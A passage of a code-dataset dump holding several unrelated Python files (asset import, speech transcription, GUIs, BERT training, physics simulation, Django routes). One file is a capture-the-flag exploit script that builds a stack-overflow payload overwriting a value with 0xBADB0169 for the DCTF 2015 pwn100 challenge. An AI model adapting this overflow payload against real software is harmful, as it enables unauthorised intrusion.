custid)\n#\n# # 获取当前asset表中的已存在所有sn与管理IP\n# list_asset_info = base.load_base_table_record(\"Equipment\", [\"sn\", \"manageip\"], custid)\n# sn_list = list(set([obj.get('sn') for obj in list_asset_info.get(\"equipment\")]))\n# if sn_list.count('') > 0:\n# sn_list.remove('')\n# ip_list = list(set([obj.get('manageip') for obj in list_asset_info.get(\"equipment\")]))\n# if ip_list.count('') > 0:\n# ip_list.remove('')\n#\n# # 开始导入数据\n# for obj in excel_data:\n# assets_obj_info = dict(assetname=obj[0], usetype=obj[1],\n# assettype_id=base_table_id_dict['baseequipmenttype'].get(obj[2], None),\n# room_id=base_table_id_dict['basemachineroom'].get(obj[4], None),\n# cabinet=int(obj[5]) if isinstance(obj[5], float) else obj[5],\n# manageip=obj[6],\n# slotindex=int(obj[7]) if isinstance(obj[7], float) else obj[7],\n# model=obj[8],\n# sn=int(obj[9]) if isinstance(obj[9], float) else obj[9],\n# powertype=obj[10],\n# factory_id=base_table_id_dict['basefactory'].get(obj[11], None),\n# netarea_id=base_table_id_dict['basenetarea'].get(obj[12], None),\n# tradedate=obj[13] if obj[13] else None,\n# expiredate=obj[14] if obj[14] else None,\n# status_id=base_table_id_dict[\"baseassetstatus\"].get(obj[15], None),\n# remark=obj[16],\n# id=base.nextid(models.Equipment._meta.db_table, custid),\n# updateuser=request_data.get(\"user\").username,\n# createuser=request_data.get(\"user\").username,\n# # createuser='cmdb', updateuser='cmdb',\n# cust_id=custid, assetno=common.create_assno()\n# )\n# # 开始校验数据\n# # sn, manageip\n# err_msg = \"\"\n# if not assets_obj_info.get(\"assetname\"):\n# err_msg = \"{0}| 设备名称不能为空 \".format(err_msg)\n#\n# if assets_obj_info.get('sn') in sn_list:\n# err_msg = \"{0}| 序列号 {1} 已存在 \".format(err_msg, assets_obj_info.get(\"sn\"))\n#\n# if assets_obj_info.get('manageip') in ip_list:\n# err_msg = \"{0}| 管理IP {1} 已存在 \".format(err_msg, assets_obj_info.get(\"manageip\"))\n# if not assets_obj_info.get('model'):\n# err_msg = \"{0}| 设备型号不能为空 \".format(err_msg)\n#\n# if err_msg:\n# fail_record.append({\"row\": excel_data.index(obj) + 1, \"errmsg\": err_msg.strip()[1:]})\n# continue\n# else:\n# if assets_obj_info.get('sn'):\n# sn_list.append(assets_obj_info.get('sn'))\n# if assets_obj_info.get('manageip'):\n# ip_list.append(assets_obj_info.get('manageip'))\n#\n# # 校验没问题就加入到要创建的列表中\n# # save_record.append(models.Equipment(**assets_obj_info))\n#\n# # 将对象批量写入库\n# # models.Equipment.objects.bulk_create(save_record)\n# import_result[\"info\"] = \"导入完成!执行{0}条 成功{1}条, 失败{2}条.\".format(len(excel_data), len(save_record),\n# len(fail_record))\n# import_result[\"data\"] = fail_record\n# import_result[\"status\"] = False if len(fail_record) > 0 else True\n#\n# except Exception as e:\n# logger.error(e)\n# import_result[\"info\"] = \"导入错误!\"\n#\n# return import_result\n\ndef import_excel(request_data, excel_data):\n \"\"\"\n 针对太原银行导入Excel文件到数据库\n :param excel_data:\n :param request_data:\n :return:\n \"\"\"\n save_record = list()\n fail_record = list()\n import_result = response_format()\n custid = request_data.get(\"custid\")\n print(excel_data)\n try:\n base_table = [('BaseEquipmentType', ['name', 'id']), ('BaseDataCenter', ['name', 'id']),\n ('BaseMachineRoom', ['name', 'id']), ('Staffs', ['name', 'id']),\n ('BaseAssetStatus', ['status', 'id']), ('BaseNetArea', ['name', 'id']),\n ('BaseFactory', ['name', 'id'])\n ]\n # 导入数据中的下拉框值对应的ID字典\n base_table_id_dict = base.convert_table_field(base_table, 0, 1, custid)\n # 获取自定义扩展字段信息\n extend_field = common.list_to_dict(common.get_table_extend_fields(custid, \"Equipment\"), 'label', 'to_field')\n\n # 获取当前asset表中的已存在所有sn与管理IP\n list_asset_info = base.load_base_table_record(\"Equipment\", [\"sn\", \"manageip\"], custid)\n sn_list = list(set([obj.get('sn') for obj in list_asset_info.get(\"equipment\")]))\n if sn_list.count('') > 0:\n sn_list.remove('')\n ip_list = list(set([obj.get('manageip') for obj in list_asset_info.get(\"equipment\")]))\n if ip_list.count('') > 0:\n ip_list.remove('')\n\n # 开始导入数据\n for obj in excel_data:\n assets_obj_info = dict(\n customer001=obj[1], customer002=obj[2], manageip=obj[3], customer003=obj[4],\n customer004=obj[6], room_id=base_table_id_dict['basemachineroom'].get(obj[7], None),\n assettype_id=base_table_id_dict['baseequipmenttype'].get(obj[8], None),\n customer005=obj[9], customer006=obj[10], customer007=obj[11],\n customer008=obj[12], customer009=obj[13], customer016=obj[14], customer010=obj[15],\n usetype=obj[16], cabinet=int(obj[17]) if isinstance(obj[17], float) else obj[17],\n slotindex=int(obj[18]) if isinstance(obj[18], float) else obj[18],\n customer011=obj[19], customer012=obj[20],\n netarea_id=base_table_id_dict['basenetarea'].get(obj[21], None),\n tradedate=obj[22] if obj[22] else None,\n expiredate=obj[23] if obj[23] else None,\n provider_id=base_table_id_dict['basefactory'].get(obj[24], None),\n serviceprovider_id=base_table_id_dict['basefactory'].get(obj[25], None),\n status_id=base_table_id_dict[\"baseassetstatus\"].get(obj[26], None),\n customer013=obj[27],\n factory_id=base_table_id_dict['basefactory'].get(obj[28], None),\n model=obj[29],\n sn=int(obj[30]) if isinstance(obj[30], float) else obj[30],\n assetname=obj[31], customer015=obj[32],\n id=base.nextid(models.Equipment._meta.db_table, custid),\n updateuser=request_data.get(\"user\").username,\n createuser=request_data.get(\"user\").username,\n # createuser='cmdb', updateuser='cmdb',\n cust_id=custid, assetno=common.create_assno()\n )\n # 开始校验数据\n # sn, manageip\n err_msg = \"\"\n if not assets_obj_info.get(\"assetname\"):\n err_msg = \"{0}| 设备名称不能为空 \".format(err_msg)\n\n if assets_obj_info.get('sn') in sn_list:\n err_msg = \"{0}| 序列号 {1} 已存在 \".format(err_msg, assets_obj_info.get(\"sn\"))\n\n if assets_obj_info.get('manageip') in ip_list:\n err_msg = \"{0}| 管理IP {1} 已存在 \".format(err_msg, assets_obj_info.get(\"manageip\"))\n if not assets_obj_info.get('model'):\n err_msg = \"{0}| 设备型号不能为空 \".format(err_msg)\n\n if err_msg:\n fail_record.append({\"row\": excel_data.index(obj) + 1, \"errmsg\": err_msg.strip()[1:]})\n continue\n else:\n if assets_obj_info.get('sn'):\n sn_list.append(assets_obj_info.get('sn'))\n if assets_obj_info.get('manageip'):\n ip_list.append(assets_obj_info.get('manageip'))\n\n # 校验没问题就加入到要创建的列表中\n save_record.append(models.Equipment(**assets_obj_info))\n\n # 将对象批量写入库\n models.Equipment.objects.bulk_create(save_record)\n import_result[\"info\"] = \"导入完成!执行{0}条 成功{1}条, 失败{2}条.\".format(len(excel_data), len(save_record),\n len(fail_record))\n import_result[\"data\"] = fail_record\n import_result[\"status\"] = False if len(fail_record) > 0 else True\n\n except Exception as e:\n logger.error(e)\n import_result[\"info\"] = \"导入错误!\"\n\n return import_result\n","repo_name":"tonglinge/MyProjects","sub_path":"cmdb/afcat/cmdb/libs/equipment.py","file_name":"equipment.py","file_ext":"py","file_size_in_byte":52140,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"40589708525","text":"import io\nfrom pydub import AudioSegment\nimport speech_recognition as sr\nimport whisper\nimport queue\nimport tempfile\nimport os\nimport threading\nimport click\nimport torch\nimport numpy as np\n\n@click.command()\n@click.option(\"--model\", default=\"base\", help=\"Model to use\", type=click.Choice([\"tiny\",\"base\", \"small\",\"medium\",\"large\"]))\n@click.option(\"--english\", default=False, help=\"Whether to use English model\",is_flag=True, type=bool)\n@click.option(\"--verbose\", default=False, help=\"Whether to print verbose output\", is_flag=True,type=bool)\n@click.option(\"--energy\", default=300, help=\"Energy level for mic to detect\", type=int)\n@click.option(\"--dynamic_energy\", default=False,is_flag=True, help=\"Flag to enable dynamic engergy\", type=bool)\n@click.option(\"--pause\", default=0.8, help=\"Pause time before entry ends\", type=float)\n@click.option(\"--save_file\",default=False, help=\"Flag to save file\", is_flag=True,type=bool)\ndef main(model, english,verbose, energy, pause,dynamic_energy,save_file):\n temp_dir = tempfile.mkdtemp() if save_file else None\n #there are no english models for large\n if model != \"large\" and english:\n model = model + \".en\"\n audio_model = whisper.load_model(model)\n audio_queue = queue.Queue()\n result_queue = queue.Queue()\n threading.Thread(target=record_audio,\n args=(audio_queue, energy, pause, dynamic_energy, save_file, temp_dir)).start()\n threading.Thread(target=transcribe_forever,\n args=(audio_queue, result_queue, audio_model, english, verbose, save_file)).start()\n\n while True:\n print(result_queue.get())\n\n\ndef record_audio(audio_queue, energy, pause, dynamic_energy, save_file, temp_dir):\n #load the speech recognizer and set the initial energy threshold and pause threshold\n r = sr.Recognizer()\n r.energy_threshold = energy\n r.pause_threshold = pause\n r.dynamic_energy_threshold = dynamic_energy\n\n with sr.Microphone(sample_rate=16000) as source:\n print(\"Say something!\")\n i = 0\n while True:\n #get and save audio to wav file\n audio = r.listen(source)\n if save_file:\n data = io.BytesIO(audio.get_wav_data())\n audio_clip = AudioSegment.from_file(data)\n filename = os.path.join(temp_dir, f\"temp{i}.wav\")\n audio_clip.export(filename, format=\"wav\")\n audio_data = filename\n else:\n torch_audio = torch.from_numpy(np.frombuffer(audio.get_raw_data(), np.int16).flatten().astype(np.float32) / 32768.0)\n audio_data = torch_audio\n\n audio_queue.put_nowait(audio_data)\n i += 1\n\n\ndef transcribe_forever(audio_queue, result_queue, audio_model, english, verbose, save_file):\n while True:\n audio_data = audio_queue.get()\n if english:\n result = audio_model.transcribe(audio_data,language='english')\n else:\n result = audio_model.transcribe(audio_data)\n\n if not verbose:\n predicted_text = result[\"text\"]\n result_queue.put_nowait(\"You said: \" + predicted_text)\n else:\n result_queue.put_nowait(result)\n\n if save_file:\n os.remove(audio_data)\n\n\nmain()","repo_name":"TeamDman/toolformer","sub_path":"backend/old/mic.py","file_name":"mic.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"95"} +{"seq_id":"14063158478","text":"import tkinter as tk\nfrom tkinter import filedialog, messagebox\n\n\nclass FileTransferGUI:\n def __init__(self, master):\n self.master = master\n master.title(\"File Transfer App\")\n self.folder_pairs = []\n \n self.source_label = tk.Label(master, text=\"Source Folders:\")\n self.source_label.grid(row=0, column=0)\n\n self.dest_label = tk.Label(master, text=\"Destination Folder:\")\n self.dest_label.grid(row=0, column=1)\n\n self.add_button = tk.Button(master, text=\"Add Folder Pair\", command=self.add_folder_pair)\n self.add_button.grid(row=0, column=2)\n\n self.move_button = tk.Button(master, text=\"Move Files\", command=self.move_files)\n self.move_button.grid(row=0, column=3)\n\n def add_folder_pair(self):\n source_folder = filedialog.askdirectory()\n if source_folder:\n dest_folder = filedialog.askdirectory()\n if dest_folder:\n file_extensions = filedialog.askstring(\"File Extensions\", \"Enter file extensions separated by comma: \")\n folder_pair = {\"source_folder\": source_folder, \"dest_folder\": dest_folder, \"file_extensions\": file_extensions}\n self.folder_pairs.append(folder_pair)\n row = len(self.folder_pairs) + 1\n source_var = tk.StringVar()\n source_var.set(source_folder)\n dest_var = tk.StringVar()\n dest_var.set(dest_folder)\n source_entry = tk.Entry(self.master, textvariable=source_var, state=tk.DISABLED)\n source_entry.grid(row=row, column=0)\n dest_entry = tk.Entry(self.master, textvariable=dest_var, state=tk.DISABLED)\n dest_entry.grid(row=row, column=1)\n check_var = tk.IntVar()\n check_button = tk.Checkbutton(self.master, variable=check_var)\n check_button.grid(row=row, column=2)\n self.folder_pairs[-1][\"source_var\"] = source_var\n self.folder_pairs[-1][\"dest_var\"] = dest_var\n self.folder_pairs[-1][\"check_var\"] = check_var\n self.folder_pairs[-1][\"source_entry\"] = source_entry\n self.folder_pairs[-1][\"dest_entry\"] = dest_entry\n self.folder_pairs[-1][\"check_button\"] = check_button\n\n def move_files(self):\n # Move files from source folders to destination folders\n pass\n\n","repo_name":"Theblackcat98/AutoTransferX","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"2257566167","text":"from transformers import AdamW, get_linear_schedule_with_warmup\nfrom sklearn.utils import shuffle\n\nfrom utils import *\nimport torch\nfrom BERT_BCE.CredDataset import *\nfrom BERT_BCE.CredClassifier import *\nfrom BERT_BCE.train import train_bert\n\nbert_model = \"albert-base-v2\" # 'albert-base-v2', 'albert-large-v2', 'albert-xlarge-v2', 'albert-xxlarge-v2', 'bert-base-uncased', ...\nfreeze_bert = False # if True, freeze the encoder weights and only update the classification layer weights\nmaxlen = 510 # maximum length of the tokenized input sentence pair : if greater than \"maxlen\", the input is truncated and else if smaller, the input is padded\nbs = 4 # batch size\niters_to_accumulate = 2 # the gradient accumulation adds gradients over an effective batch of size : bs * iters_to_accumulate. If set to \"1\", you get the usual batch size\nlr = 2e-5 # learning rate\nepochs = 4 # number of training epochs\n\nset_seed(1)\nimport pandas as pd\n\ndf_train=shuffle(pd.read_csv(\"train.csv\",sep=';'))\ndf_test=shuffle(pd.read_csv(\"test.csv\",sep=';'))\n# Creating instances of training and validation set\nprint(\"Reading training data...\")\ntrain_set = CredDataset(df_train, maxlen, bert_model)\nprint(\"Reading validation data...\")\nval_set = CredDataset(df_test, maxlen, bert_model)\n# Creating instances of training and validation dataloaders\ntrain_loader = DataLoader(train_set, batch_size=bs, num_workers=5)\nval_loader = DataLoader(val_set, batch_size=bs, num_workers=5)\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nnet = CredClassifier(bert_model, freeze_bert=freeze_bert)\n\nif torch.cuda.device_count() > 1: # if multiple GPUs\n print(\"Let's use\", torch.cuda.device_count(), \"GPUs!\")\n net = nn.DataParallel(net)\n\nnet.to(device)\n\ncriterion = nn.CrossEntropyLoss()\nopti = AdamW(net.parameters(), lr=lr, weight_decay=1e-2)\nnum_warmup_steps = 0 # The number of steps for the warmup phase.\nnum_training_steps = epochs * len(train_loader) # The total number of training steps\nt_total = (len(train_loader) // iters_to_accumulate) * epochs # Necessary to take into account Gradient accumulation\nlr_scheduler = get_linear_schedule_with_warmup(optimizer=opti, num_warmup_steps=num_warmup_steps, num_training_steps=t_total)\n\ntrain_bert(net, criterion, opti, lr, lr_scheduler, train_loader, val_loader, epochs, iters_to_accumulate,device,bert_model)","repo_name":"HRishabh95/Credibility_Combined","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26845557023","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom influxdb import InfluxDBClient\r\n\r\nclient = InfluxDBClient(host='localhost', port=8086)\r\n\r\nclient.get_list_database()\r\nclient.switch_database('beverage')\r\n\r\n\r\nresult = client.query(\"\"\"select * from pet_sensor_readings where \"Day\" = '21' and \"Hour\" = '6' \"\"\")\r\nresult\r\nresult.raw\r\ne = next(iter(result))\r\n\r\ndf = pd.DataFrame(e)\r\ndf_1 = df.drop([\"Co2\", \"Month\", \"Year\", \"product\", \"Uday\"], axis=1)\r\n#client.query('select * from \"pet_sensor_readings\" where \"time\" = Now()-1d')\r\ndf_1.columns\r\nneworder = ['time','Preform','Blower', 'Plasmax','Filler', 'Date_coder','Labeller', 'PSP', 'Palletizer', 'Day', \"Week\",\"Hour\",]\r\ndf_1 = df_1.reindex(columns=neworder)\r\n\r\ndf_1['time'].head()\r\n\r\n# x=df_1[\"time\"].iloc[0:5013, ]\r\n# y=df_1[\"Preform\"].iloc[0:5013,]\r\n# y1=df_1[\"Blower\"].iloc[0:5013,]\r\n# y2=df_1[\"Plasmax\"].iloc[0:5013,]\r\n# y3=df_1[\"Filler\"].iloc[0:5013,]\r\n\r\n# plt.plot(x, y, marker = 'o', color='Black')\r\n# plt.plot(x, y1, marker = '', color='Blue')\r\n# plt.plot(x, y2, marker = '', color='Red')\r\n# plt.plot(x, y3, marker = '', color='Purple')\r\n# plt.show()\r\n\r\n# df_1[\"Preform\"].value_counts()\r\n\r\n# #points = result.get_points()\r\n# is_16 = df_1['Day']=='16'\r\n# day_16 = df_1[is_16]\r\n# is_6 = day_16['Hour']=='6'\r\n# day_166 = day_16[is_6]\r\n\r\n# cond1 = df_1['Day'] =='16'\r\n# cond2 = df_1['Hour'] =='6'\r\n# allcond = cond1 & cond2\r\n# df_1 = df_1[allcond]\r\n\r\n# df_1['Preform'].value_counts()\r\n# df_1['Blower'].value_counts()\r\n\r\n# #ss_day16 = client.query('select \"time\",\"Preform\",\"Blower\", \"Plasmax\",\"Filler\", \"Date_coder\",\"Labeller\", \"PSP\", \"Palletizer\" from \"pet_sensor_readings\" where \"Day\"= '16' ' )\r\n# #day_16 = next(iter(ss_day16)) \r\n\r\n# ss_day16.raw\r\n\r\n# df_1.head\r\n\r\n# #df.to_csv(\"L:\\pet_sensor_reading1.csv\")\r\n\r\n# #a = 1364797 \r\n# #b = 1048574\r\n# #print(a-b)\r\n\r\n# #df_subset = df.iloc[1048575:1364797, :]\r\n\r\n# df_1.to_csv(\"L:\\pet_day16.csv\")\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n","repo_name":"upendradama/Predictive-Maintainance-for-Beverages","sub_path":"Automation/frominflux.py","file_name":"frominflux.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"32449391869","text":"\na = [[[0, 0], [0.5, -1], [0.3, 0]], [[0.3, 0], [0.5, -1], [1.5, 1]], [[0.5, -1],\n[1.5, -0.2], [1.5, 1]], [[1.5, -0.2], [2, -0.5], [1.5, 1]], [[2, -0.5], [2, 0],\n[1.5, 1]], [[0.3, 0], [0.5, 1], [0, 0]]]\n\n\nl0=a[0]\ndic={'R':[l0[0]],'G':[l0[1]],'B':[l0[2]]}\nadd = list(map(lambda x:x, l0))\nflag = set()\nfor arr in range(1,len(a)):\n for subarr in a[arr]:\n for k,v in dic.items():\n if subarr in v:\n flag.add(k)\n for subarr in a[arr]:\n if subarr in add:\n continue\n else:\n if subarr not in dic['G'] and 'G' not in flag:\n add.append(subarr)\n dic['G'].append(subarr)\n flag.add('G')\n elif subarr not in dic['R'] and 'R' not in flag:\n add.append(subarr)\n dic['R'].append(subarr)\n flag.add('R')\n elif subarr not in dic['B'] and 'B' not in flag:\n add.append(subarr)\n dic['B'].append(subarr)\n flag.add('B')\n if len(flag) >= 3:\n flag=set()\ncolor=[]\nfor arr in a:\n line=[]\n for subarr in arr:\n for k,v in dic.items():\n if subarr in v:\n line.append(k)\n color.append(line)\nprint(dic)\nprint(add)\nprint()\nc = 0\nfor i in a:\n \n print(c, i, color[c])\n c += 1\n","repo_name":"fdetun/practice_algo","sub_path":"trianglecolorsbyfoued.py","file_name":"trianglecolorsbyfoued.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"ceb","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"36181963291","text":"from struct import pack\n\nf = open(\"payload\", \"w\")\npayload = \"A\"*44 # buffer size\npayload+= \"B\"*8 # dummy\npayload+= pack(\"<L\", 0xBADB0169)\npayload+= \"\\x00\\x00\\x00\\x00\"\n\nf.write(payload)\nf.close()\n\n# (cat payload;cat)|./e100\n","repo_name":"myeonggyunhan/write-ups","sub_path":"2015/dctf2015/pwn100/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"70002820794","text":"from django.conf import settings\nfrom django.conf.urls import patterns, include, url\nfrom django.conf.urls.static import static\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\njs_info_dict = {\n\t'packages': ('pages',),\n}\n\nurlpatterns = patterns('',\n\t(r'^i18n/', include('django.conf.urls.i18n')),\n\t(r'^jsi18n/$', 'django.views.i18n.javascript_catalog', js_info_dict),\n\t\n\t# Uncomment the next line to enable the admin:\n\turl(r'^admin/', include(admin.site.urls)),\n\t\n\turl(r'^$', 'pages.views.index', name='home'),\n\turl(r'^decks/(?P<deck_id>\\d+)/cards/$', 'pages.views.cards_api'),\n\turl(r'^search/$', 'pages.views.search'),\n\turl(r'^author/(?P<author>.*)/deck/(?P<deck_slug>.*)/study/$', 'pages.views.study'),\n\turl(r'^author/(?P<author>.*)/deck/(?P<deck_slug>.*)/cards/$', 'pages.views.card_listing'),\n\turl(r'^author/(?P<author>.*)/deck/(?P<deck_slug>.*)/$', 'pages.views.launch'),\n\n\t# Uncomment the admin/doc line below to enable admin documentation:\n\t# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n)\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\nurlpatterns += staticfiles_urlpatterns()","repo_name":"codehearts/sleepless","sub_path":"demo/sleepless_demo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"70665442872","text":"from datetime import timedelta\nfrom platform import system\nimport os\nimport threading\nfrom subprocess import Popen, DEVNULL\nimport tkinter as tk\nimport tkinter.ttk as ttk\nfrom tkinter import N, E, S, W, END\nfrom tkinter.messagebox import askyesno\nimport sys\n\nfrom sparkmemes.__main__ import render\n\n\nclass Config:\n def __init__(self, root):\n self.root = root\n self.root.title(\"SparkMemes GUI\")\n\n tk.Grid.rowconfigure(self.root, 0, weight=1)\n tk.Grid.columnconfigure(self.root, 1, weight=1)\n\n self.duration = ttk.Scale(\n self.root, command=self.update_time, from_=2, to=250, orient=\"vertical\"\n )\n self.duration.grid(column=0, row=0, rowspan=2, sticky=N + S)\n\n self.prefix = \"r/\"\n self.subreddits = tk.Listbox(self.root, selectmode=\"multiple\")\n self.subreddits.bind(\"<<ListboxSelect>>\", self.update_subreddits)\n self.subreddits.grid(column=1, row=0, sticky=N + E + S + W)\n for x in [\n \"insanepeoplefacebook\",\n \"mildlyinfuriating\",\n \"therewasanattempt\",\n \"woooosh\",\n \"dankmemes\",\n \"me_irl\",\n \"meirl\",\n \"memes\",\n \"wholesomememes\",\n \"MemeEconomy\",\n \"BikiniBottomTwitter\",\n ]:\n self.subreddits.insert(END, self.prefix + x)\n\n self.stats = ttk.Label(self.root, anchor=\"center\")\n self.stats.grid(column=1, row=1, sticky=E + W)\n self.duration.set(\"10\")\n\n self.create = ttk.Button(\n self.root, text=\"Create\", command=self.create_video, state=\"disabled\"\n )\n self.create.grid(column=0, row=2, columnspan=2, sticky=S + E + W)\n\n def create_video(self):\n self.set_state(self.root)\n self.root.update()\n sub_list = [self.subreddits.get(x) for x in self.subreddits.curselection()]\n sub_list = [\n x[x.startswith(self.prefix) and len(self.prefix) :] for x in sub_list\n ]\n self.meme = threading.Thread(\n target=self.render_video, args=(sub_list, self.duration.get())\n )\n self.meme.daemon = True\n self.meme.start()\n\n # Thread this\n def render_video(self, sub_list, duration):\n render(sub_list, duration)\n if askyesno(title=\"Video made\", message=\"Do you want to view it?\"):\n self.open_file(\"video.mp4\")\n self.root.destroy()\n\n def update_subreddits(self, event):\n if len(self.subreddits.curselection()) > 0:\n self.create.config(state=\"enabled\")\n else:\n self.create.config(state=\"disabled\")\n\n def update_time(self, count):\n count = round(float(count))\n if count < 2:\n self.duration.set(\"2\")\n return\n if count > 250:\n self.duration.set(\"250\")\n return\n self.stats.config(\n text=\"{} Memes ({})\".format(count, timedelta(seconds=(count * 10) + 30))\n )\n\n def set_state(self, widget, state=\"disabled\"):\n try:\n widget.configure(state=state)\n except tk.TclError:\n pass\n for child in widget.winfo_children():\n self.set_state(child, state=state)\n\n def open_file(self, filepath):\n if system() == \"Darwin\": # macOS\n Popen(\n (\"open\", filepath),\n start_new_session=True,\n stdout=DEVNULL,\n stderr=DEVNULL,\n )\n elif system() == \"Windows\": # Windows\n os.startfile(filepath)\n elif system() == \"Linux\": # Linux\n Popen(\n (\"xdg-open\", filepath),\n start_new_session=True,\n stdout=DEVNULL,\n stderr=DEVNULL,\n )\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n config = Config(root)\n root.update()\n root.minsize(root.winfo_width(), root.winfo_height())\n root.mainloop()\n print(\"Goodbye...\")\n","repo_name":"AlexApps99/SparkMemes","sub_path":"sparkmemes/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3961,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"19830938048","text":"import stanza\nimport codecs\nimport argparse\nimport os\n\n\ndef extract_nouns(en_nlp, text):\n doc = en_nlp(text)\n nouns = set()\n for sent in doc.sentences:\n candidate = \"\"\n for word in sent.words:\n if word.deprel == \"nsubj\":\n candidate += word.text if len(candidate) == 0 else \" \" + word.text\n else:\n if len(candidate) > 0:\n nouns.add(candidate)\n candidate = \"\"\n return nouns\n\n\ndef convert_to_unicode(text):\n \"\"\"Converts `text` to Unicode (if it's not already), assuming utf-8 input.\"\"\"\n\n if isinstance(text, str):\n return text\n elif isinstance(text, bytes):\n return text.decode(\"utf-8\", \"ignore\")\n else:\n raise ValueError(\"Unsupported string type: %s\" % (type(text)))\n\n\ndef main(_):\n en_nlp = stanza.Pipeline('en', use_gpu=True)\n\n input_files = []\n for filename in os.listdir(args.input_file):\n input_files.extend(os.path.join(args.input_file, filename))\n\n nouns = set()\n with codecs.open(args.output_file, \"w\", encoding=\"utf-8\") as out:\n for input_file in input_files:\n reader = open(input_file, \"r\")\n\n while True:\n # label [\\t] text1 [\\t] text2 [\\n]\n line = convert_to_unicode(reader.readline())\n if not line:\n break\n line = line.strip()\n line = line.split('\\t')\n text1, text2 = line[1], line[2]\n noun_set1, noun_set2 = extract_nouns(en_nlp, text1), extract_nouns(en_nlp, text2)\n nouns = nouns.union(noun_set1.union(noun_set2))\n print(\" File %s stanza extraction done!!!\", input_file)\n\n for kw in nouns:\n print(kw, file=out)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='BERT Similarity Project')\n parser.add_argument('--input_file', type=str, required=True, help='Plain Input file directory.')\n parser.add_argument('--output_file', type=str, required=True, help='Output file.')\n args = parser.parse_args()\n main(args)\n","repo_name":"wuqiyao20160118/BERT_Similarity","sub_path":"keyword_extraction.py","file_name":"keyword_extraction.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"3028428703","text":"#!/usr/bin/env python3\nimport matplotlib.pyplot as plot\nimport csv\nimport subprocess\nimport sys\nimport numpy as np\n\nif len(sys.argv) != 4:\n print(\"Usage:\", sys.argv[0],\n \"<num_particles> <mimas_multiplier> <num_time_steps>\")\n exit(1)\nsubprocess.run(\n \"clang -lm -Ofast -march=native sim_ring_gaps.c -o sim_ring_gaps\",\n shell=True, check=True)\ndata_filename = 'data/mimas_mult=' + sys.argv[2] + '&p=' + sys.argv[1] + \\\n '&t=' + sys.argv[3] + '.csv'\nsubprocess.run(\n \"./sim_ring_gaps \" + ' '.join(sys.argv[1:]) + \" > '\" + data_filename + \"'\",\n check=True, shell=True)\ndata = csv.reader(open(data_filename))\nxm, ym = next(data)\nplot.gca().set_aspect('equal')\nplot.title(\"p=\" + sys.argv[1] + \", m=\" + sys.argv[2] +\n \", t=\" + sys.argv[3], fontsize=8)\nplot.xlabel(\"Distance from Saturn (m)\")\nplot.ylabel(\"Distance from Saturn (m)\")\nplot.plot(float(xm), float(ym), \"ro\", label=\"Mimas\")\nplot.plot(0, 0, \"yo\", markersize=20, label=\"Saturn\")\nx, y = next(data)\nplot.plot(float(x), float(y), \"go\", markersize=1, label=\"Ring Particle\")\n\nparticles_in_division = 0.0\nfor x, y in data:\n if 1.1758e8 < np.sqrt(float(x)**2 + float(y)**2) < 1.2217e8:\n particles_in_division += 1\n plot.plot(float(x), float(y), \"go\", markersize=1)\nplot.plot(1.1758e8, 0, \"bo\", markersize=0.2, label=\"Cassini Division\")\n\nfor i in range(360):\n ir = i * np.pi / 180\n plot.plot(1.1758e8 * np.cos(ir), 1.1758e8 * np.sin(ir), \"bo\", markersize=0.2)\n plot.plot(1.2217e8 * np.cos(ir), 1.2217e8 * np.sin(ir), \"bo\", markersize=0.2)\nplot.figtext(0.05, 0.95, \"Ratio of particles in division to total: \" +\n str(particles_in_division / int(sys.argv[1])))\n\nplot.legend(loc='upper right')\nplot.savefig('img/mimas_mult=' + sys.argv[2] + '&p=' + sys.argv[1] + '&t=' +\n sys.argv[3] + '.png')\n","repo_name":"durcor/ring-gap-sim","sub_path":"sim_ring_gaps.py","file_name":"sim_ring_gaps.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"19311800322","text":"def get_rs_chosen_smiles(rs_chosen, r_smiles_dict_1, r_smiles_dict_2):\n \"\"\"\n This function returns a list of SMILES strings for every R-group chosen.\n It requires the R_smile_dictionary for both ligands to function.\n\n Inputs:\n :param list rs_chosen: A list of the chosen R-groups which will be used to\n generate a new mol. ie) ['2R2', '1R1']\n :param dict r_smiles_dict_1: A dictionary which has can find the SMILES\n string for each R-group of Ligand 1. ie) {'1R1':\n '[10006*][1009N]=[1008N+]=[1007N-]'}\n :param dict r_smiles_dict_2: A dictionary which has can find the SMILES\n string for each R-group of Ligand 2. ie) {'2R2': '[10006*][2009OH]',\n '2R1': '[10003*][2007CH2][2008OH]'}\n\n\n 